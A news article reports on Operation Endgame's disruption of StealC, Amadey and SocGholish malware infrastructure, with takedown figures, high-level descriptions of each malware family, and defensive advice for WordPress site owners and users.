Operation Endgame Disrupts StealC, Amadey and SocGholish Malware Infrastructure

Law enforcement agencies and cybersecurity companies have disrupted infrastructure used by StealC, Amadey and SocGholish, three malware families tied to credential theft, ransomware access and large-scale cybercrime. The latest action was announced under Europol’s Operation Endgame update.

The operation targeted the systems that help criminals infect devices, steal passwords and sell access to other attackers. Microsoft described the action as a strike against the cybercrime supply chain, not just one malware service.

The official Operation Endgame page says law enforcement and private-sector partners actioned 326 servers and 142 domains, identified and restricted more than €41 million in crypto assets, recovered about 27 million stolen credentials, and remediated 14,971 infected websites.

Key results from the operation

Action	Reported result
Servers and domains actioned	326 servers and 142 domains
Crypto assets identified and frozen or restricted	More than €41 million
Stolen credentials recovered	About 27 million
Compromised websites remediated	14,971 websites
Main malware families targeted	StealC, Amadey and SocGholish

The disruption happened in connected phases. The Dutch Police announced the SocGholish action on June 18, while Europol later detailed the broader strike against StealC, Amadey and SocGholish networks.

The countries involved included Canada, Denmark, Germany, the Netherlands, the United Kingdom and the United States. Europol and Eurojust supported the cross-border work, while private companies contributed malware analysis, infrastructure mapping, legal action and victim notification support.

Why StealC and Amadey matter

Amadey and StealC often work together. Microsoft’s Digital Crimes Unit says Amadey helps attackers gain access to devices, while StealC steals passwords and sensitive information after infection.

That combination makes the two malware families valuable to cybercriminals. Amadey can act as a loader that brings other malware onto a device, while StealC can harvest browser passwords, cookies, session data, autofill entries, crypto wallet data and other information that attackers can reuse or sell.

ESET Research said both malware families operate as malware-as-a-service tools. That means affiliates can rent or buy access to the malware ecosystem without building their own tools from scratch.

• Amadey is mainly used for initial access and payload delivery.
• StealC focuses on stealing credentials and other sensitive data.
• Stolen credentials can feed fraud, account takeover and ransomware access.
• Shared infrastructure can make separate malware families part of the same criminal chain.
• Disrupting the infrastructure can break several attack stages at once.

StealC investigation exposed millions of stolen credentials

IBM X-Force and Proofpoint said their StealC-focused work helped seize more than 25.6 million unique credentials taken from more than 385,000 compromised systems. The researchers also said a vulnerability in the StealC command-and-control panel helped support the disruption.

That detail shows how defenders can sometimes turn malware operators’ own weaknesses against them. Security researchers mapped parts of the StealC ecosystem, tracked infrastructure, and provided technical intelligence that helped law enforcement act against criminal servers and domains.

The result does not mean StealC or Amadey will disappear overnight. Malware-as-a-service groups often try to rebuild after takedowns. Still, disrupting servers, domains, credentials and payment assets at the same time makes recovery slower and more expensive for operators and affiliates.

SocGholish cleanup focused on hacked WordPress sites

The SocGholish part of the operation focused heavily on compromised WordPress websites. The Dutch Police statement said 14,971 infected websites were remediated, including sites used by restaurants, auto garages and other everyday businesses.

SocGholish, also known as FakeUpdates, spreads through fake browser update prompts on hacked websites. If a visitor installs the fake update, the malware opens the door for attackers to gain access and deploy additional malware.

The Operation Endgame site says SocGholish is linked to Evil Corp, the Russian cybercriminal group associated with Zeus, Dridex, ransomware activity and money-laundering operations.

Malware	Main role	Common impact
StealC	Infostealer and dropper	Credential theft, session theft and data resale
Amadey	Loader and botnet malware	Initial access, additional payload delivery and data theft
SocGholish	Fake update loader	Compromised websites, malware delivery and ransomware access

How private companies helped the takedown

The operation combined police action, legal action, malware reverse engineering and infrastructure tracking. ESET said it provided technical analysis, known command-and-control servers, encryption keys, campaign identifiers and other data collected from long-term tracking of Amadey and StealC.

Proofpoint and IBM X-Force also supported the StealC investigation by tracking infrastructure and developing tools to emulate StealC activity. This helped researchers identify servers, payloads and related operations.

Microsoft said AI-assisted analysis helped investigators connect Amadey and StealC infrastructure faster. The company also used civil legal action to disrupt more than 200 command-and-control servers tied to the two malware families.

What website owners and users should do now

Website owners, especially WordPress administrators, should treat the SocGholish action as a warning. Even small business websites can become malware delivery points if attackers steal credentials, add backdoors or abuse outdated plugins.

• Change WordPress admin passwords immediately if compromise is suspected.
• Enable multi-factor authentication for all administrator accounts.
• Remove unknown admin users and unused accounts.
• Update WordPress core, themes and plugins.
• Check for injected scripts, unfamiliar files and hidden backdoors.
• Scan endpoints for stealers if credentials were exposed.
• Reset passwords stored in browsers on any infected device.

Users should also avoid browser update prompts that appear inside random webpages. Genuine browser updates should come from the browser’s own update menu, the operating system settings page or an official app store.

Why Operation Endgame matters

Operation Endgame shows how modern cybercrime works like a supply chain. One group provides access, another steals data, another sells credentials, and another uses that access for fraud or ransomware.

That structure lets attacks scale quickly. It also gives defenders a stronger target. When authorities disrupt shared infrastructure, payment flows, domains and stolen credential stores, they can make the whole criminal chain less reliable.

The latest action will not end infostealer malware, but it raises the cost for criminals who rely on StealC, Amadey and SocGholish. For defenders, it also reinforces a simple lesson: credentials, websites and endpoints must all be protected because attackers connect them into one attack path.

FAQ